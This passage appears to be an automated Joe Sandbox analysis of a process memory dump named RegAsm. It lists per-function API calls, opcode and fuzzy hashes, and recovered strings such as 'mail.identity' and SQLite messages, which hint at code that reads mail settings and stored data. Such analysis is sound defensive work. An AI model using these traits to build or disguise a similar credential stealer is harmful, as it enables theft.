                                                                                                                                                                                                • Opcode ID: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                                                                                                                                • Instruction ID: 8228d9f6412a3e952053f7d3f56c39de874a44e07f5fc6281cc9d0b5593e34d3
                                                                                                                                                                                                • Opcode Fuzzy Hash: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                                                                                                                                • Instruction Fuzzy Hash: C8215172E102896BEB19DBA5D846FAF73FCEB84700F00446AB511D7281FB28E644C765
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ??2@$memset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1860491036-0
                                                                                                                                                                                                • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                                                                                                                                                                • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                                                                                                                • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 004048C2
                                                                                                                                                                                                • memset.MSVCRT ref: 004048D6
                                                                                                                                                                                                • memset.MSVCRT ref: 004048EA
                                                                                                                                                                                                • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                                                • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$memcpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 368790112-0
                                                                                                                                                                                                • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                                                                                                • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                                                                                                                                                                • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                                                                                                • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                                • memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                                • memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                                • memset.MSVCRT ref: 0040D319
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$memcpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 368790112-0
                                                                                                                                                                                                • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                                                                                • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                                                                                                                                • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __allrem.LIBCMT ref: 00425850
                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                                                                                                                                                • __allrem.LIBCMT ref: 00425933
                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1992179935-0
                                                                                                                                                                                                • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                                                                                                                • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                                                                                                                                                                                • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                                                                                                                • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • too many SQL variables, xrefs: 0042C6FD
                                                                                                                                                                                                • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                                • API String ID: 2221118986-515162456
                                                                                                                                                                                                • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                                                                                • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                                                                                                                                • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000000), ref: 0043007E
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                • String ID: $, $CREATE TABLE
                                                                                                                                                                                                • API String ID: 3510742995-3459038510
                                                                                                                                                                                                • Opcode ID: ec2d01fe33c012397d4d1731dfc45432bb5b9ee0a9ad26789851577151ff7e1c
                                                                                                                                                                                                • Instruction ID: b8263f634f048474639948e4306e081d81924a11902ad0262d34aeb61c893b0c
                                                                                                                                                                                                • Opcode Fuzzy Hash: ec2d01fe33c012397d4d1731dfc45432bb5b9ee0a9ad26789851577151ff7e1c
                                                                                                                                                                                                • Instruction Fuzzy Hash: C351A472D00129DFCF10CF94D541AAFB7F4EF49319F61406BE840EB205E778AA4A8B98
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                                                                                                                • memset.MSVCRT ref: 004026AD
                                                                                                                                                                                                  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                                  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                                  • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                                  • Part of subcall function 004108E5: CoTaskMemFree.OLE32(00000000), ref: 00410970
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3503910906-0
                                                                                                                                                                                                • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                                                                • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                                                                                                                                • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0040C922
                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                                                                                                                                • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                                                                                                                                • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Message$MenuPostSendStringmemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3798638045-0
                                                                                                                                                                                                • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                                                                                                                                • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                                                                                                                                                                • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                                                                                                                                • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                                                                                                                                                                                                  • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                                                                                                                                                                • strlen.MSVCRT ref: 0040B60B
                                                                                                                                                                                                • atoi.MSVCRT(?), ref: 0040B619
                                                                                                                                                                                                • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                                                                                                                • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4107816708-0
                                                                                                                                                                                                • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                                                                                                                                • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                                                                                                                                • _gmtime64.MSVCRT ref: 00411437
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                                                                                                                                • strftime.MSVCRT ref: 00411476
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1886415126-0
                                                                                                                                                                                                • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                                                                                                                • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: strlen
                                                                                                                                                                                                • String ID: >$>$>
                                                                                                                                                                                                • API String ID: 39653677-3911187716
                                                                                                                                                                                                • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                                                                                                                                • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                                                                                                                • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                                                                                                                                • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                • API String ID: 3510742995-2766056989
                                                                                                                                                                                                • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                                                                • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _strcmpi
                                                                                                                                                                                                • String ID: C@$mail.identity
                                                                                                                                                                                                • API String ID: 1439213657-721921413
                                                                                                                                                                                                • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                                                                                                                                • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                                                                                                                                • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3473537107-0
                                                                                                                                                                                                • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                                                                • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                                                                                                                                • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                                                                • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • SHGetMalloc.SHELL32(?), ref: 00410F20
                                                                                                                                                                                                • SHBrowseForFolder.SHELL32(?), ref: 00410F52
                                                                                                                                                                                                • SHGetPathFromIDList.SHELL32(00000000,?), ref: 00410F66
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 00410F79
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: BrowseFolderFromListMallocPath_mbscpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1479990042-0
                                                                                                                                                                                                • Opcode ID: 3021ac6996c314945b367224c7bd8111e1d6ec744ed02b95fe82b7a37a02f8bd
                                                                                                                                                                                                • Instruction ID: 6920bf835a9bb06566ba915c59caace60c79acb7cf9a25d2f41614c9f7770f55
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3021ac6996c314945b367224c7bd8111e1d6ec744ed02b95fe82b7a37a02f8bd
                                                                                                                                                                                                • Instruction Fuzzy Hash: D411ECB5900208AFDB10DFE5D985AEEB7F8FB49314B10446AE505E7200D7B4DA458B64
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00406640
                                                                                                                                                                                                  • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                                                                                                                  • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                                  • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                                • memcmp.MSVCRT ref: 00406672
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy$memset$memcmp
                                                                                                                                                                                                • String ID: Ul@
                                                                                                                                                                                                • API String ID: 270934217-715280498
                                                                                                                                                                                                • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                                                                • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                                                                                                                • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                                  • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                                • sprintf.MSVCRT ref: 0040B929
                                                                                                                                                                                                • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                                                                  • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                                  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                                • sprintf.MSVCRT ref: 0040B953
                                                                                                                                                                                                • _mbscat.MSVCRT ref: 0040B966
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 203655857-0
                                                                                                                                                                                                • Opcode ID: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                                                                                                                                                • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                                                                                                                                                                                • Opcode Fuzzy Hash: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                                                                                                                                                • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0040ADE8
                                                                                                                                                                                                • memset.MSVCRT ref: 0040ADFE
                                                                                                                                                                                                  • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                                  • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                                • sprintf.MSVCRT ref: 0040AE28
                                                                                                                                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                                • String ID: </%s>
                                                                                                                                                                                                • API String ID: 3699762281-259020660
                                                                                                                                                                                                • Opcode ID: f78139877eceb876a4a519055c942f2d4715b4df0d29a6dcbc188ebede795ba7
                                                                                                                                                                                                • Instruction ID: ff04cb2e9b10d1c503b051559ee948e99af9d8289afd69eb184e92e88926625d
                                                                                                                                                                                                • Opcode Fuzzy Hash: f78139877eceb876a4a519055c942f2d4715b4df0d29a6dcbc188ebede795ba7
                                                                                                                                                                                                • Instruction Fuzzy Hash: CF01F97290012967E721A619CC46FDEB76C9F54304F0500FAB50DF3142DA74AA448BA5
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • recovered %d pages from %s, xrefs: 004188B4
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                                                                                                                                • String ID: recovered %d pages from %s
                                                                                                                                                                                                • API String ID: 985450955-1623757624
                                                                                                                                                                                                • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                                                                                                                • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                                                                                                                • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
